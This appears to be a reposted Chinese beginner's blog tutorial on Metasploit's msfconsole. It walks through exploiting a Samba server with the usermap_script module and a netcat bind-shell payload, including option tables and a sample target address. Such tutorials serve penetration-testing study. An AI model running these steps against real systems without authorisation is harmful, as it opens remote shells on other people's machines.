Metasploit入门手册(msfconsole)

msfconsole客户端使用说明:
    help            --    列出所有命令 
    search     samba    -- 搜索攻击samba服务器的模块 
    use muti/samba/usermap_script    选择该渗透攻击模块;
    show payloads    -- 搜索usermap_script模块兼容的攻击载荷;
    set payload cmd/unix/bind_netcat    --使用cmd/unix/bind_netcat载荷,即使用netcat工具在渗透攻击成功后执行shell,
    并通过netcat绑定在一个端口上。
    show options    -- 查看需要配置哪些配置参数;
    
Module options (exploit/multi/samba/usermap_script):

Name    Current    Setting            Required            Description
----    ---------------            --------            ----------------
RHOST                            yes                    The target address
RPORT    139                        yes                    The target port (TCP)

Payload options (cmd/unix/bind_netcat):

Name    Current Setting            Required            Description
----    ---------------            --------            ----------------
LPORT    4444                    yes                    The listen port
RHOST                            no                    The target address

Exploit target:
    ID            Name 
    ---            ----
    0            Automatic
    
## 设置攻击主机 
set    RHOST    10.10.10.254
## 执行渗透命令:
exploit
 

猜你喜欢

转载自blog.csdn.net/weixin_30961725/article/details/83216751